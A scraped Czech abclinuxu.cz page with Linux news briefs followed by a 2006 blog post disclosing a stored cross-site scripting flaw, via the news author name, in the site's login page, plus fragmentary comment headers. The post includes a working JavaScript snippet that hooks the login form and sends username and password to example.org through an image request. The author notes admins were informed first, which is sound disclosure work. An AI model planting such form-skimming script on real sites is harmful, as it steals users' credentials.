Bylo oznámeno vydání Fedora Linuxu 44. Ve finální verzi vychází šest oficiálních edic: Fedora Workstation a Fedora KDE Plasma Desktop pro desktopové, Fedora Server pro serverové, Fedora IoT pro internet věcí, Fedora Cloud pro cloudové nasazení a Fedora CoreOS pro ty, kteří preferují neměnné systémy. Vedle nich jsou k dispozici také další atomické desktopy, spiny a laby. Podrobný přehled novinek v samostatných článcích na stránkách
… více »David Malcolm se na blogu vývojářů Red Hatu rozepsal o vybraných novinkách v GCC 16, jež by mělo vyjít v nejbližších dnech. Vypíchnuta jsou vylepšení čitelnosti chybových zpráv v C++, aktualizovaný SARIF (Static Analysis Results Interchange Format) výstup a nová volba experimental-html v HTML výstupu.
Byla vydána verze R14.1.6 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5, Wikipedie). Přehled novinek v poznámkách k vydání, podrobnosti v seznamu změn.
Jon Seager z Canonicalu včera na Ubuntu Community Hubu popsal budoucnost AI v Ubuntu. Dnes upřesnil: AI nástroje budou k dispozici jako Snap balíčky, vždy je může uživatel odinstalovat. Ve výchozím nastavení budou všechny AI nástroje používat lokální AI modely.
Nový ovladač Steam Controller jde do prodeje 4. května. Cena je 99 eur.
Greg Kroah-Hartman začal používat AI asistenta pojmenovaného gkh_clanker_t1000. V commitech se objevuje "Assisted-by: gkh_clanker_t1000". Na social.kernel.org publikoval jeho fotografii. Jedná se o Framework Desktop s AMD Ryzen AI Max a lokální LLM.
Ubuntu 26.10 bude Stonking Stingray (úžasný rejnok).
Webový prohlížeč Dillo (Wikipedie) byl vydán ve verzi 3.3.0. S experimentální podporou FLTK 1.4. S příkazem dilloc pro ovládání prohlížeče z příkazové řádky. Vývoj prohlížeče se přesunul z GitHubu na vlastní doménu dillo-browser.org (Git).
Byl publikován přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Vývojáři v přehledu vypíchli vylepšenou instalaci, podporu senzoru okolního světla, úsporu energie, opravy Bluetooth nebo zlepšení audia. Vývoj lze podpořit na Open Collective a GitHub Sponsors.
raylib (Wikipedie), tj. multiplatformní open-source knihovna pro vývoj grafických aplikací a her, byla vydána ve verzi 6.0.
Když tak řeším bezpečností chyby v phpMyAdminovi, napadlo mě jak jsou proti podobným věcem zabezpečené portály. Protože dost často používám abclinuxu, tak přišlo první na mušku 
.
Předem podotýkám, že tento článek byl nejdříve dán k dispozici adminům, takže doufám, že v době zveřejnění už není možné toto provést.
Většina prohlížečů dnes umí javascript, který se dá dělat spousta zajímavých věcí. Třeba přidat javascript na obsluhu nějaké událost nebo posílat XML HTTP requesty. Bystřejším již možná dochází, že pokud si můžu vložit vlastní javascript, není žádný problém odchytit odesílání přihlašovacího formuláře. Kdo nevěří, může si zkusit následující ukázku (ta heslo jenom zobrazí, ale to už je jenom detail):
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
<script type="text/javascript">
<!--
function process() {
p = document.getElementById('pwd').value;
u = document.getElementById('usr').value;
document.getElementById('ls_prepinac').innerHTML =
'<img src="http://example.org/?u=' +
u + '&p=' + p + '"/>';
window.alert('odeslano na example.org:\npass: ' +
p + '\n' + 'user: ' + u);
}
function load() {
frm = document.forms[0];
frm.onsubmit = process;
}
window.onload = load;
//-->
</script>
<div id="ls_prepinac">xx</div>
<form method="post">
<input type="text" name="u" id="usr">
<input type="password" name="p" id="pwd">
<input type="submit">
</form>
Teď už jenom zbývá jak dostat vlastní javascript na logovací stránku. Protože je samostatná, tak jediná věc, která je tam vidět z uživatelem ovlivnitelného obsahu jsou zprávičky. Obsah zpráviček je (aspoň v to doufám) kontrolován na dovolené html, ale ještě nám zbývá jeden zajímavý prvek. Tím je naše jméno, tam si můžeme napsat cokoliv co chceme, včetně javascriptu. Tak teď už jen zbývá doufat, že to moc lidí nezrealizovalo . Napsat zprávičku, která bude schválena až takový problém není a pak už je dílo dokonáno.
Jaké je řešení? Nedovolovat nikde javascript, dá se použít k mnoha nebezpečným věcem.
Stav chyby:
)
Tiskni
Sdílej:
2.5.2006 22:20
wake | skóre: 30
| blog: wake
| Praha
2.5.2006 22:34
hajma | skóre: 27
| blog: hajma
| Říčany
3.5.2006 05:26
David Watzke | skóre: 74
| blog: Blog...
| Praha
3.5.2006 08:53
.. | skóre: 4
| blog:
.
3.5.2006 10:10
xvasek | skóre: 21
| blog:
| Zlín
Hmm, tak jsem chtěl přihodit veselou historku z natáčení a ukázat fintu, jak jsme to dělali za starých časů my a našel jsem jinou (ne až tak velkou) zranitelnost ábíčka. Kam to oznámit? (Resp. teda jaký má Leoš jabber nebo mail? Nebo do bugzilly?)
.
3.5.2006 11:49
xvasek | skóre: 21
| blog:
| Zlín
Zatím mi poslal smajlíka, takže radost zřejmě má.
Jenze to bych musel prestat pouzivat jednu knihovnu na parsovani HTML, takze moc prace.
.
3.5.2006 21:45
brozkeff | skóre: 13
| blog: Zpátky po 10 letech
| Žďár nad Sázavou
))
. Ale pokud máš javascript povolený pro abclinuxu.cz a někomu se to podaří vložit přímo do stránky, tak to ničemu nezabrání.